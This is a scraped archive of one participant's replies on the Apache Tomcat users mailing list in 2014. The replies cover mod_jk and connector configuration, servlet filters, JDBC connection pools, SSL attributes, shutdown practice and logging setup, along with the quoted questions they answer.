 [root@server tomcat-connectors-1.2.28-src]# cat
 /etc/httpd/conf.d/mod_jk.conf
 JkWorkersFile /etc/httpd/conf.d/workers.properties
 JkLogFile /var/log/httpd/mod_jk.log
 JkLogLevel info
 JkLogStampFormat [%a %b %d %H:%M:%S %Y] 
 JkOptions +ForwardKeySize +ForwardURICompat -ForwardDirectories
 JkRequestLogFormat %w %V %T
 JkMount /* worker1
 JkShmFile /etc/httpd/logs/jk-runtime-status
 
 [root@server tomcat-connectors-1.2.28-src]# cat
 /etc/httpd/conf.d/workers.properties
 workers.tomcat_home=/usr/share/apache-tomcat-6.0.37/
 workers.java_home=/usr/java/default
 ps=/
 worker.list=worker1
 worker.default.port=8009
 worker.default.host=localhost
 worker.default.type=ajp13
 
 Is there anyway to check which type is this NIO or BIO?
MGcheck the Connector in server.xml

 
 -BEGIN PGP SIGNATURE-
  Version: GnuPG v1
  Comment: GPGTools - http://gpgtools.org
  Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
 
  iQIcBAEBCAAGBQJTKFFMAAoJEBzwKT+lPKRYS74P/1UkDakuqDz6LyLUaBeTzcXl
  R/2eliStJMAE146C6QpE2YBV4w2dyh/xEnndRmbE3R3NE9cD3yUom+VO7x1OOgL9
  ODM8Ry5AWXBXqhjx2k4hjRM43Hza6Z+GJYb9RutdLj71GCU4fEFrTX23sCAkUKbx
  nzCGMG4robj7l6TDSdK6uZpmisV7LGBWsUIjkJnTX5AvxFhU5QsFOISE/osFAy6I
  ukw840t57BCJ0mlIV/EBORa+0BCO+lz7ZBk+kkwHG5mSXFapTqNcySKfYGEzkVmD
  8OHBJehmkqHfBuqgiavIwpLZ3wZnLcrJpsMzdxGUG1wuuFVtr1aRZ+h/L+/diUnE
  B37m9fOuwd3RfY7uhJXATiYo8oW5nB/EOIYuKDsfgMi7eY/NBg2r8Rw7MHYLJUuN
  lXtHJTyyBLQcgw5twnTbdA5MPbdgjZ2A2uw6sKCf5/vNyZBkGky+6Fush9cMRIL/
  zdmNyJCCP9jzBOltFl0NNW/bpI1UKpMk8bScJZvAC3JNvMt1FCu3e4rQmqJXlzwG
  yBIQeqoIHpogLbF5CxGcOUJGV80O0o5vq+N2qt7TArqOHEifGhroVAQPEOtYmI/K
  x7u4Xv+VPg19YmRS6PJCYkYw082vFbmanXjt7BgmUWNs3WD1ooe66bmWPzKX3btA
  HcuHDQFgyaGQu0z55MYP
  =Vqt8
  -END PGP SIGNATURE-
 
  -
  To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
  For additional commands, e-mail: users-h...@tomcat.apache.org
 
 
 
 
 -- 
 Randeep
 Mob: +919447831699[kerala]
 Mob: +919880050349[B'lore]
 I blog here:
 http://www.randeeppr.me/
 Follow me Here:
 http://twitter.com/Randeeppr
 Poke me here!
 http://www.facebook.com/Randeeppr
 A little Linux Help
 http://www.linuxhelp.in/
 Work profile:
 http://in.linkedin.com/in/randeeppr
  

RE: filter question

[Martin Gainty]

you'll need to pass your modified response to service method of servlet which 
is *in* the filterChain


ApplicationFilterChain::internalDoFilter(ServletRequest request, 
ServletResponse response)
throws IOException, ServletException 

{

servlet.service(request, response);

...

}

Martin 


  



 Date: Thu, 13 Mar 2014 17:51:59 -0700
 Subject: filter question
 From: catph...@catphive.net
 To: users@tomcat.apache.org
 
 I have a filter with doFilter method like this:
 
 public void doFilter(ServletRequest request,
 ServletResponse response,
 FilterChain chain)
 throws IOException, ServletException {
 HttpServletRequest req = (HttpServletRequest) request;
 HttpServletResponse resp = (HttpServletResponse) response;
 
 resp.setHeader(Cache-Control,
 must-revalidate, max-age=0, post-check=0,
 pre-check=0);
 
 chain.doFilter(request, response);
 }
 
 This sets the header. However, if I set the header *after* chain.doFilter,
 the header is not set. Why is this?
 
 public void doFilter(ServletRequest request,
 ServletResponse response,
 FilterChain chain)
 throws IOException, ServletException {
 HttpServletRequest req = (HttpServletRequest) request;
 HttpServletResponse resp = (HttpServletResponse) response;
 
 chain.doFilter(request, response);
 
 resp.setHeader(Cache-Control,
 must-revalidate, max-age=0, post-check=0,
 pre-check=0);
 }
 
 Programmatically I can see the header is null.
 
 Has the content already been sent to the web browser after chain.doFilter?
 If so, is there a way to delay sending data to the browser? I need to
 inspect the status code in the response before setting my header (to
 prevent 404's from being cached).
 
 Thanks,
 Brendan Miller
  

RE: Stream closed- IOException exception

[Martin Gainty]

  


 Date: Thu, 6 Mar 2014 11:13:22 +0530
 Subject: Re: Stream closed- IOException exception
 From: prashantkada...@gmail.com
 To: users@tomcat.apache.org
 
 On Wed, Mar 5, 2014 at 9:34 PM, Christopher Schultz 
 ch...@christopherschultz.net wrote:
 
  -BEGIN PGP SIGNED MESSAGE-
  Hash: SHA256
 
  Prashant,
 
  On 3/5/14, 9:14 AM, Prashant Kadam wrote:
   On Wed, Mar 5, 2014 at 7:11 PM, Prashant Kadam
   prashantkada...@gmail.comwrote:
  
  
  
  
   On Mon, Mar 3, 2014 at 10:55 PM, Christopher Schultz 
   ch...@christopherschultz.net wrote:
  
   Prashant,
  
   On 3/3/14, 6:04 AM, Prashant Kadam wrote:
   please help ... I have removed whitespaces by adding
   jsp-config jsp-property-group
   url-pattern*.jsp/url-pattern
   trim-directive-whitespacestrue/trim-directive-whitespaces
  
  
  /jsp-property-group /jsp-config but still i am facing same
   error.
  
   This may or may not do anything.
  
   I tried to increase the buffer size also as, %@ page
   buffer=800kb autoFlush=false % but still same
   error
  
   Hm. With a huge buffer, the only reason the response would have
   been committed is if a flush() was being called somewhere. You said
   you gutted the struts actions, but it's possible that somewhere,
   Struts is internally flushing the buffer. (That would surprise me,
   honestly). Are you sure there are no errors occurring anywhere?
   Often, an error will cause the response to be committed.
  
   BTW you probably never want to use autoFlush=false unless you
   are watching the buffer very carefully. For debugging, it's fine,
   but you certainly don't want to do that on a regular basis.
  
   stuck on this issue for more than 2 weeks now and need to
   close it ASAP please help.
  
   Remember that this is a community made up of volunteers. This
   problem / ticket is *yours* and not ours to be solved ASAP.
   Everybody's issues need to be solved ASAP, of course. If you want
   something done ASAP and you can't do it yourself, then you'll have
   to pay someone else to do it.
  
   Any help/ pointer would be highly appreciated.
  
   one more things, we are using struts version 1 and tiles
   2.2. as struts1 doesn't work with tiles2, we have used
   struts-tiles2-1.4.0-SNAPSHOT.jar, can this create any
   problem, but this combination work with tomcat version
   below 7.0.37 and giving issues from version 7.0.39.
  
   Can anybody please tell me what are the changes in between
   these two versions which can produce this errror ??
  
   You could take a look at the Changelog for version 7.0.39 (or .38)
   to see if anything looks probable. I recommend using a debugger as
   Konstantin suggests and trap the condition. You'll be able to
   unwind the stack to see what code is causing the response to be
   committed.
  
  
  
   hi Thanks for your reply. I started debugging the code and
   found some pointers but not able to fully identify the root
   cause. What I found is,
  
   In TilesRequestProcessor class
  
   protected void doForward( String uri, HttpServletRequest
   request, HttpServletResponse response) throws IOException,
   ServletException {
  
   if (response.isCommitted()) { this.doInclude(uri, request,
   response);
  
   } else { super.doForward(uri, request, response); } }
  
   with version 7.0.39, somewhere
   org.apache.jasper.runtime.ServletResponseWrapperInclude.*isCommited*
   is setting to false, causing forward but response is already
   commited and throws IO Exception. with version 7.0.37,
   particularly for this request this flag sets to true and it
   works.
  
   any pointers on this ? how can I find from where this is
   setting to false ?
  
  
  
   I found the class *org.apache.coyote.Response* ... where this
   flag is being set, public void setCommitted(boolean v) {
   this.commited = v; }
  
   its default value is false and in my case it does not come here
   when I debug, so remains false. But when I use 7.0.37, this
   method gets called and it sets this flag to true.
  
   Is there any changes in tomcat which can cause this behavior ?
 
  I'm not sure. What did the stack trace look like when
  setCommitted(true) was called? That's more important than knowing
  /that/ it was called...
 
 
 hi Chris thanks for reply
 
 May be I failed to explain properly my understanding, I will explain the
 scenario once again
 
 I am including one jsp in another jsp, there are different behaviors for 2
 tomcat versions as below
 
 1. case in 7.0.37 - setCommitted(true) was called and thus in tiles code
 (pasted below), it includes the jsp and works fine with no exception thus
 no stack strace
 
 TilesRequestProcessor class
 protected void doForward( String uri, HttpServletRequest
 request, HttpServletResponse response) throws IOException,
 ServletException {
 if (response.isCommitted()) {
 this.doInclude(uri, request, response);
 } else {
 super.doForward(uri, request, response); }
MGDO NOT COMMIT THE RESPONSE HERE IN THIS SERVLET
MGALLOW URL YOU 

RE: understanding jdbc pool

[Martin Gainty]

  


 From: neven.cvetko...@gmail.com
 Date: Wed, 5 Mar 2014 20:25:36 -0500
 Subject: Re: understanding jdbc pool
 To: users@tomcat.apache.org
 
 On Wed, Mar 5, 2014 at 3:15 PM, S Ahmed sahmed1...@gmail.com wrote:
 
  Hi,
 
  With jdbc pool, is each socket connection in the pool handled by a separate
  thread?
 
 
 Ahmed, thanks for asking this question - it is sometimes very confusing
 with all different kind of pools: connection pools, threadpools, etc...
 
 Chris pointed out already - the connection pool does not have any
 threads... It is not a process that runs in the background, these are just
 connection objects that are sitting in memory.
 
 Threads are created by the Tomcat container (executor) once the connection
 is received by the Connector. The created thread is then going to be
 handled by the container and it will go through the stack call, through
 Valves, Filters, Servlets, your middleware layer, DAOs, JDBC/JPA calls and
 then finally through your datasource object, connection, PreparedStatement,
 ResultSet, etc... and back all the way to the socket that browser
 initiated, returning the thread to the threadpool (e.g. http-bio-8080).
 
 Now, I am not sure about the connection pool implementation details, how
 connection pool keeps connections open, if there are any background threads
 that are handling connection management (closing abandoned connections,
 opening new connections as the demand rises, etc...)
 
 Maybe someone can comment on that.
MGNot from 1.4 commons-dbcp..here is a typical reference to Thread in source
MGThread.currentThread().
MG(Although I have seen multiple thread calls in attached testcases) I have 
not seen Separate Thread in main body
MGI am sure  someone here would put a feature request in to support 
Thread-Aware Connections
MGIf you put the feature request in I will second the request (and make sure 
ThreadAware gets implemented)
MGThen again Im sure there are other libraries that will handle Thread aware 
database connection pools
MGwould anyone know the names of those libraries?
MGBTW Mr Schultz is right
 
  Say you have 20 connections set to be open at minimum, does that mean there
  will be 20 threads? If not, then there is a degree of serialization then
  right?
 
 
 
 Well, there will be no serialization, but rather synchronization as there
 are at most  available connections, if the connection pool (datasource)
 reaches maximum allowed connections, depending on the implementation - it
 would be a blocking call, until the pool has available connection to
 provide...
 
 Look at the documentation for Tomcat default connection pool implementation:
 https://tomcat.apache.org/tomcat-7.0-doc/jdbc-pool.html
 
 
 Hopefully that clears some of the confusion.
 
 
 Cheers!
 Neven
  

RE: java: src/network.c:441: Java_org_apache_tomcat_jni_Socket_send: Assertion failed

[Martin Gainty]

FYI If you are using NIO Connector you will want to supply these NIO Connector 
attributes

https://tomcat.apache.org/tomcat-7.0-doc/config/http.html#Standard_Implementation

 

If you are using SSL on NIO read SSL on NIO for that capability

 

APR Native SSL would use these parameters






Attribute
Description

SSLCACertificateFile

See the mod_ssl documentation.


SSLCACertificatePath

See the mod_ssl documentation.


SSLCARevocationFile

See the mod_ssl documentation.


SSLCARevocationPath

See the mod_ssl documentation.


SSLCertificateChainFile

See the mod_ssl documentation.


SSLCACertificateFile

Name of the file that contains the concatenated certificates for the trusted 
certificate authorities. The format is PEM-encoded.


SSLCACertificatePath

Name of the directory that contains the certificates for the trusted 
certificate authorities. The format is PEM-encoded.


SSLCARevocationFile

Name of the file that contains the concatenated certificate revocation lists 
for the certificate authorities. The format is PEM-encoded.


SSLCARevocationPath

Name of the directory that contains the certificate revocation lists for the 
certificate authorities. The format is PEM-encoded.


SSLCertificateChainFile

Name of the file that contains concatenated certifcates for the certificate 
authorities which form the certifcate chain for the server certificate. The 
format is PEM-encoded.


SSLCertificateFile

Name of the file that contains the server certificate. The format is 
PEM-encoded.


SSLCertificateKeyFile

Name of the file that contains the server private key. The format is 
PEM-encoded. The default value is the value of SSLCertificateFile and in this 
case both certificate and private key have to be in this file (NOT RECOMMENDED).


SSLCipherSuite

Ciphers which may be used for communicating with clients. The default is ALL, 
with other acceptable values being a list of ciphers, with : used as the 
delimiter (see OpenSSL documentation for the list of ciphers supported).


SSLDisableCompression

Disables compression if set to true and OpenSSL supports disabling compression. 
Default is false which inherits the default compression setting in OpenSSL.


SSLHonorCipherOrder

Set to true to enforce the server's cipher order (from the SSLCipherSuite 
setting) instead of allowing the client to choose the cipher (which is the 
default).


SSLPassword

Pass phrase for the encrypted private key. If SSLPassword is not provided, 
the callback function should prompt for the pass phrase.


SSLProtocol

Protocol which may be used for communicating with clients. The default value is 
all, which is equivalent to SSLv3+TLSv1 with other acceptable values being 
SSLv2, SSLv3, TLSv1 and any combination of the three protocols concatenated 
with a plus sign. Note that the protocol SSLv2 is inherently unsafe.


SSLVerifyClient

Ask client for certificate. The default is none, meaning the client will not 
have the opportunity to submit a certificate. Other acceptable values include 
optional, require and optionalNoCA.


SSLVerifyDepth

Maximum verification depth for client certificates. The default is 10.

 

Tweak these Connector timeout parameters to acomodate your requirement

asyncTimeout

connectionTimeout

connectionUploadTimeout

disableUploadTimeout

executorTerminationTimeoutMillis

keepAliveTimeout

socket.soTimeout

socket.unlockTimeout

selectorTimeout
sessionTimeout


(yes..Mr Schultz is correct on the last statement)
Martin-

  



 Date: Wed, 5 Mar 2014 15:12:02 +0200
 Subject: Re: java: src/network.c:441: Java_org_apache_tomcat_jni_Socket_send: 
 Assertion failed
 From: dmitry.batiyevs...@ardas.dp.ua
 To: users@tomcat.apache.org
 
 Atmosphere upgrade didn't help
 
 Regards,
 
 Dmitry Batiyevskiy
 
 Ardas Group Inc.
 
 www.ardas.dp.ua
 
 
 2014-03-05 9:39 GMT+02:00 Dmitry Batiyevskiy dmitry.batiyevs...@ardas.dp.ua
 :
 
  We are ok with tomcat 7.0.42 and old tcnative now, and may be next
  tcnative update will work appropriately
  We will try updating atmosphere before trying NIO anyway
 
  Regards,
 
  Dmitry Batiyevskiy
 
  Ardas Group Inc.
 
  www.ardas.dp.ua
 
 
  2014-03-04 23:18 GMT+02:00 Christopher Schultz 
  ch...@christopherschultz.net:
 
  -BEGIN PGP SIGNED MESSAGE-
  Hash: SHA256
 
  Dmitry,
 
  On 3/4/14, 2:48 AM, Dmitry Batiyevskiy wrote:
   Howard, My connector config is the following (i've already posted
   that):
  
   Connector port=8443 maxHttpHeaderSize=8192 maxThreads=15000
   enableLookups=false disableUploadTimeout=true acceptCount=100
   scheme=https secure=true SSLEnabled=true compression=off
   SSLCertificateFile=/opt/tomcat/mycompany.com.crt
   SSLCertificateKeyFile=/opt/tomcat/mycompany.com.key /
  
   Also -Dhttps.protocols=TLSv1 option is passed to java machine
  
   The reason for me to use apr connector is https performance, isn't
   NIO much slower in that?
 
  I don't have any recent performance data, but using OpenSSL is
  apparently measurably faster than using 

RE: Difference between process kill and shutdown

[Martin Gainty]

 Date: Sat, 1 Mar 2014 04:11:57 -0800
 Subject: Difference between process kill and shutdown
 From: akash.delh...@gmail.com
 To: users@tomcat.apache.org
 
 On our linux boxes, we have multiple users who run tomcat.
 
 Currently we are using process kill commands to kill the respective user's
 tomcat , instead of using shutdown.sh
MGBad Practice
 
 Are there any downsides of using this approach ?
MGThere are horrible downsides 
MGA Kill will take the running process out of the execution environment..no 
matter what the side effect is
MGHooks to any of the configured Server Listeners CATALINA has started can be 
ignored and usually are
MGThe result of a kill on parent process is 
MG you will still have one or more Listeners running as child daemons since 
they were never shutdown properly
MGWhoever told you to use the kill command instead of shutdown should be 
court-martialed!

 
 Thanks,
 Akash
  

RE: Tomcat/Java Spring MVC 2.0/c3p0 - Consultant needed

[Martin Gainty]

I assume based on all the wonderful experiences the states have experienced 
in last dozen years that Canada has wised up and stopped Americans from 
sneaking across the border without a passport?

better pack you snowshoes..they have about 6 feet of snow (last time i checked)

 

Keep me apprised,
M-

  



 Date: Tue, 25 Feb 2014 11:50:30 -0400
 Subject: Re: Tomcat/Java Spring MVC 2.0/c3p0 - Consultant needed
 From: charle...@thelearningbar.com
 To: users@tomcat.apache.org
 
 On Tue, Feb 25, 2014 at 11:37 AM, Daniel Mikusa dmik...@gopivotal.comwrote:
 
  On Feb 25, 2014, at 10:14 AM, Charles Richard 
  charle...@thelearningbar.com wrote:
 
   Hi,
  
   On Tue, Feb 25, 2014 at 1:26 AM, Christopher Schultz 
   ch...@christopherschultz.net wrote:
  
   -BEGIN PGP SIGNED MESSAGE-
   Hash: SHA256
  
   Charles,
  
   On 2/24/14, 10:15 AM, Charles Richard wrote:
   Sorry if this is not the right forum for this kind of inquiry. I
   figure the best candidates would be in this forum from personal
   experience.
  
   Our company is having production issues which I believe are either
   due to application inefficiencies or a bug somewhere in our
   software stack.
  
   We are having production issues with our Tomcat connection pool
   using c3p0 and while my knowledge in this area has improved, I lack
   the Java developer background that might help in this area and we
   are at a point where we need this solved quickly.
  
   I've never gotten the sense that c3p0 was production-ready. What made
   you deploy with c2p0 instead of either of the two connection pools
   that ship with Tomcat? (Note that c3p0 has nothing to do with Tomcat,
   other than that Tomcat can be configured to use c3p0 as its
   connection-pool).
  
  
   That is good to know that c3p0 might not be commonly used in production
  by
   companies using tomcats. I was under the impression it was the most
   commonly used.
  
  
   The problems could be related to leaked connections which I'm quite
   sure we have. I have turned on c3p0 debugging and identified this
   in the past and the ideal consultant could identify in our code
   where those are happening and fix them.
  
   Both pools Tomcat provides can help you track-down so-called
   abandoned connections by providing stack traces that point to the
   line of code that obtained the connection (or even Statement or
   ResultSet).
  
   C3P0 also allows you to track down abandoned connections and my gut
   feeling tells me how problem is not tied down exclusively to this as our
   Tomcat connection pools go from 1 used connection to 150 in a minute and
  I
   know we are not losing that many leaked connections in a minute.
   Regardless, I will check with the manager here to see if this has been
   tried in the past before I started this job and potentially try this as
   unfortunately, the problem is not happening in our staging environment.
 
  When you are experiencing the problem next, take some thread dumps. Try
  to get two or three, with 10 to 15 seconds between each one. You can then
  look at the thread dumps to see what's going on here.
 
 
  https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
 
 
 It's not easy to get good thread dumps as one minute things are fine and
 the next minute, the site is going downhill. I have bash scripts that
 monitor c3p0 connections and take an automatic thread dump as soon as the
 number exceeds what's normal.
 
 
  There is information about interpreting them here or if you need help with
  it, you could post it to the list.
 
 
  https://wiki.apache.org/tomcat/HowTo#How_do_I_read_a_Java_thread_dump_.3F
 
  I have tried to analyze the thread dumps I have gotten so far without much
 luck but this could just be that I don't understand enough what I'm looking
 for. I will look at the link provided.
 
 Thanks for taking the time to write this!
 
 Dan
 
  Cheers,
 Charles
 
  
  
   I would highly recommend that you read this blog post I wrote several
   years ago that can help you look for obvious errors by providing
   examples for what JDBC code should look like -- if you are managing
   your own JDBC calls of course:
  
  
  http://blog.christopherschultz.net/index.php/2009/03/16/properly-handling-pooled-jdbc-connections/
  
   We are looking to hire a consultant that would come to Fredericton,
   NB, Canada to work with us on this problem. Serious inquiries only.
   I will be looking for proof that you have extensive experience with
   Tomcat, Java Spring and c3p0.
  
   If you are interested, send me your resume (through your company
   or individually) and send me as much proof as possible of your
   experience with the specific technologies mentioned.
  
   While there is certainly no prohibition against doing so, this isn't
   really a help wanted message board. We are happy to help you -- for
   free! -- via email to solve your own problems. If you find this free
   forum helpful, please 

RE: Status of the current IIS ISAPI Redirector for Tomcat

[Martin Gainty]

This is a TC Users list so I will redirect the conversation to how do we use 
SPD in a Tomcat implementation
TO Wit: what you're asking is there support for SPDY Protocol in any version of 
TOMCAT?

 

Since SPDY requires the use of SSL/TLS (with TLS extension NPN)

Which version TC Container supports TLS/NPM?

 

*gruss*
Martin 
__ 

  



 From: kpreis...@apache.org
 To: users@tomcat.apache.org
 Subject: RE: Status of the current IIS ISAPI Redirector for Tomcat
 Date: Sat, 15 Feb 2014 15:00:44 +0100
 
 Hi Angel and Bilal,
 
 thank you for your replies.
 
 
  -Original Message-
  From: Angel Java Lopez [mailto:ajlopez2...@gmail.com]
  Sent: Saturday, February 15, 2014 11:59 AM
  To: Tomcat Users List
  Subject: Re: Status of the current IIS ISAPI Redirector for Tomcat
  
  Very interesting!
  
  Yes, managed code is the path to follow.
  
  First idea non-blocking IO (from C# client side): use the new async/await
  for the communication. But force to use the new .NET framework and Visual
  Studio. And await is a wait on the current threads:
  
  http://msdn.microsoft.com/en-us/library/hh750082.aspx
  
  Maybe, a node.js approach, with a callback:
  
  http://stackoverflow.com/questions/16894907/creating-asynchronous-
  methods-with-task-factory-and-callback
  and only .NET 4.0:
  http://msdn.microsoft.com/en-us/library/dd537612(v=vs.100).aspx
  
  I don't still see the value of await: it blocked the current thread. I
  guess it is better to use a callback
 
 A await on a Task in C# should internally return the current thread back to 
 a threadpool, and use a callback on another thread to continue execution of 
 the method when the Task is finished, so that threads are not blocked when 
 waiting e.g. for an I/O operation to complete. For a full utilization of 
 asynchronous I/O, one would not only have to use async read/write operations 
 when forwarding the request to Tomcat, but also async flush the response body 
 at IIS to the client (and async read the request body). Although the .Net 
 HttpResponse also seem to have BeginFlush() and EndFlush() methods that apply 
 the old-style async programming pattern, in the SPDY Redirector (see below) 
 I'm using Task.Factory.FromAsync(...) to convert these Begin/End-Methods into 
 one that returns a Task, so that it can be integrated into the existing 
 Task-based async code.
 
 For async flush and read operations at IIS to work, one will need to create 
 an async module (IHttpModule, but use context.AddOnBeginRequestAsync() 
 methods to add event handlers) or an async handler (derived from 
 HttpTaskAsyncHandler).
 
 This is the approach that I use on a draft of an SPDY redirector that can 
 already be tested with Jetty (but not yet with Tomcat), see [1]. After 
 switching from blocking I/O to async methods, the number of threads of the 
 IIS apppool (w3wp.exe) was greatly reduced when having a slow output producer 
 (servlet) on the Jetty side, and a fast client connecting to IIS (but should 
 also work for the more likely scenario: A fast output producer (Jetty) and a 
 slow client); as with blocking I/O, the IIS threads would spend most of their 
 time with doing nothing, whereas with the async approach, they can do other 
 things meanwhile.
 
 This approach suits the idea of a multiplexing SPDY as you can send multiple 
 requests on a single SPDY connection, so it doesn't block resources like 
 sockets or threads for the duration of an request. With SPDY, it should also 
 be possible to forward Websocket connections which is AFAIK not possible with 
 AJP.
 
 
  
  Angel Java Lopez
  @ajlopez
  
  
  On Fri, Feb 14, 2014 at 9:26 PM, Bilal S bilal.so...@gmail.com wrote:
  
   Konstantin,
 
 snip
 
   ==
   You raise good points. I have run into similar issues and thus created my
   own project outside the Apache foundation three years ago (BonCode). It
  is
   a C# based AJP connector. It can currently be used with Tomcat, JBOSS,
   Jetty. From support requests I am surmising that is currently bundled with
   software from a few manufacturers including: EMC, CSC, Siemens and
  others
   instead of ISAPI redirector.
  
   Thus, I do encourage the update of the current IIS connection mechanism
  to
   a more up-to-date method. Using a managed code mechanism is the way
  to go
   in my opinion.
   In the long run SPDY may also be of interest for the same purpose. The
  more
   choices the better.
  
   The following are differences already in existence with BonCode and in
   response to your extensive writing, only read on if you are curious::
   
 
 Thank you for you detailed response, this is very helpful.
 
 snip
 
6.
   
As far as I can see, the ISAPI redirector uses blocking I/O when
forwarding requests to Tomcat.
   
This means when a slow client sends a request to IIS which gets
  forwarded
to Tomcat, and Tomcat starts to send the response, in the IIS worker
process at least 

RE: Unable to shutdown Tomcat

[Martin Gainty]

MGton of log information is missing..you must have disabled the logs somehow

 Date: Fri, 14 Feb 2014 21:51:55 -0500
 From: ch...@christopherschultz.net
 To: users@tomcat.apache.org
 Subject: Re: Unable to shutdown Tomcat
 
 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA256
 
 Pooja,
 
 On 2/14/14, 5:49 PM, Pooja Swamy wrote:
  Okay. Here you go -
  
  myMac:runtime test$ bin/catalina.sh run Using CATALINA_BASE:
  /Users/test/software/runtime Using CATALINA_HOME:
  /Users/test/software/runtime Using CATALINA_TMPDIR:
  /Users/test/software/runtime/temp Using JRE_HOME: 
  /System/Library/Java/JavaVirtualMachines/1.6.0.jdk/Contents/Home 
  Using CLASSPATH: 
  /Users/test/software/runtime/bin/bootstrap.jar:/Users/test/software/runtime/bin/tomcat-juli.jar
 
  
 Feb 14, 2014 2:47:46 PM org.apache.catalina.core.AprLifecycleListener init
  INFO: The APR based Apache Tomcat Native library which allows
  optimal performance in production environments was not found on
  the java.library.path: 
  .:/Library/Java/Extensions:/System/Library/Java/Extensions:/usr/lib/java
 
 There
  
 must be more. Is there nothing else printed after that? You go
 back to a command prompt?
MGconfirm these entries in $CATALINA_HOME/conf/catalina.policy

grant codeBase file:${catalina.home}/bin/tomcat-juli.jar {
permission java.io.FilePermission
 ${java.home}${file.separator}lib${file.separator}logging.properties, 
read;

permission java.io.FilePermission
 
${catalina.base}${file.separator}conf${file.separator}logging.properties, 
read;
permission java.io.FilePermission
 ${catalina.base}${file.separator}logs, read, write;
permission java.io.FilePermission
 ${catalina.base}${file.separator}logs${file.separator}*, read, 
write;


MGalso if you do  have a custom logging.properties you will need to define 
LOGGING_CONFIG
MGduring catalina.bat start e.g

MGrem   LOGGING_CONFIG  (Optional) Override Tomcat's logging config file
rem   Example (all one line)
rem   set 
LOGGING_CONFIG=-Djava.util.logging.config.file=%CATALINA_BASE%\conf\logging.properties

MG
 - -chris
MG- -martin


 -BEGIN PGP SIGNATURE-
 Version: GnuPG v1
 Comment: GPGTools - http://gpgtools.org
 Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
 
 iQIcBAEBCAAGBQJS/tZIAAoJEBzwKT+lPKRYmZsP/2pvFj76I0UQZ8P64SehuxJG
 qs0Jj/PIX0DC4jdhqn3Hs3TkzVplvhmTxWpQdDkq8/0X56aztLtpODn634MapqT5
 NSxkMFS2xxHQ4GWeZ9iNCmOd+0HNv+bfFtB/ZVGqoU8jWSUAsyA5OXHJlDy909y7
 Y17pnLccP1wyQ0v/oTxsvhFPn0tJ1bJiXedQEHA6vQLLVaagmOdFg0M5KUi20qQs
 qkbQUjMwnwNMj2aIxGOyvntxoMgGwoA8ZJauf2tM2SFPJBEwj5lcw6gxlWgOFWFY
 l83jl0kdaK6El3S4D0J9+rPUPGsNPXtkLHieWU54U7ZBjgoX2/nCPTFPmdc4+aVO
 H/hCTXbBst5LUpO8QCBNRTg0MJHE8eLDrjtjWnaxn9rToBOC5wwHgQnCZqDTS7zG
 T1nJNU3/hqu3Im5R+f+VVOX4HKdQj+tuPEBBjkci0e7sDg0HDEUUuUQ1AThLzVtw
 6t5E/jyeRr3iga0rn96n+9r8Gv99+E8DI+GbgNQHzWpYyM7lGXW/itm3gu2jiT/a
 MQdXRkXLl7+VW0BWe78C1qgrNWkJE9420hTBvv+zHV0CGz6HZ+ui9GEqaOTO0iWm
 itBhv2XDOKcQ4DeLjKlXvZDghcP1HoZkTxszjpqUSXpGTKtFYXRqjl/zD4QG/Plo
 pkMmpzvjlsICb/YqoODD
 =14QC
 -END PGP SIGNATURE-
 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 

  

RE: Eclipse: Server Tomcat v7.0 Server at localhost failed to start.

[Martin Gainty]

  

 Date: Fri, 14 Feb 2014 14:19:04 -0800
 Subject: Re: Eclipse: Server Tomcat v7.0 Server at localhost failed to start.
 From: davek1...@gmail.com
 To: users@tomcat.apache.org
 
 OK I added servlet-api.jar and jsp-api.jar to the
 Launch Configuration | Classpath | Bootstrap Entries
 
 and get the following error report:
 HTTP Status 500 - java.lang.NoClassDefFoundError: javax/el/ELResolver
 
 
 HTTP Status 500 - java.lang.NoClassDefFoundError: javax/el/ELResolver

MGDave
MGcan you confirm el-api.jar is located in lib folder of $CATALINA_HOME ?
MG$CATALINA_HOME/lib/el-api.jar
MGMartin-
 -- 
 
 *note* *The full stack trace of the root cause is available in the Apache
 Tomcat/7.0.50 logs.*
 --
 Apache Tomcat/7.0.50
  

RE: sudden increase in tomcat sessions..?

[Martin Gainty]

DOS (Denial of Service) Attack

one type is endless ping

if someone is running a endless loop of ping attacks on your TC server

you can disable ICMP on TC server
https://www.serverintellect.com/support/windowsserversecurity/disable-icmp-requests/

 

DOC attack usually results in TROJ_MDROPPER.* on system
NAV and McAfee can detect these malware attachments on Word Docs

http://blog.trendmicro.com/trendlabs-security-intelligence/trojanized-doc-files-in-targeted-attack/


HTH
Martin 

  



 Date: Sat, 8 Feb 2014 19:54:32 -0500
 Subject: Re: sudden increase in tomcat sessions..?
 From: kumarkm...@gmail.com
 To: users@tomcat.apache.org
 
 Hi David,
 Thanks for your reply. How can I verify that it is a DOC attack? which
 log i should refer.please guide me.
 
 Thanks,
 Kumar.
 
 
 On Sat, Feb 8, 2014 at 7:42 PM, David Kerber dcker...@verizon.net wrote:
 
  On 2/8/2014 7:08 PM, Kumar Muthuramalingam wrote:
 
  Hi,
  I 'm using tomcat version 6 and 7. One day there was a sudden increase
  in
  number of sessions in both tomcats. And all the sessions had no username,
  same lastaccessed time, same created time and the inactive time was
  00:00:00. It is not happening always but it happens some times on some
  day.
  Can't predict. And We have set the idle timeout as -1 because we have to.
  When I try to dig the log. It showed that the load balancer IP was sending
  many ping requests to our application. Can anybody tell why this is
  happening and how can I find the cause?
 
 
  DOS attack?
 
 
 
  Thanks,
  Kumar.
 
 
 
  -
  To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
  For additional commands, e-mail: users-h...@tomcat.apache.org
 
 
  

RE: Menu is not working for since Tomcat 7.0.42

[Martin Gainty]

  


 Date: Thu, 9 Jan 2014 15:41:21 +0530
 Subject: Menu is not working for since Tomcat 7.0.42
 From: cch...@gmail.com
 To: users@tomcat.apache.org
 
 Hello,
 
 We have a web application which has menus and sub menus which are basically
 divs. On clicking on menu we are showing the sub menus. This happens
 through AJAX request.
 
 The application was working fine till Tomcat 7.0.41. But since 7.0.42 it
 stopped working. We are using jdk 7.
 
 We did not change anything between 7.0.41 and 7.0.42 in our side. Could
 anyone give me pointer regarding the issue?
MGImpossible... until you show us the code you are running
MGZip up (server.xml and web.xml) jsps, java code,templates..the works..put on 
dropbox and send the link
 
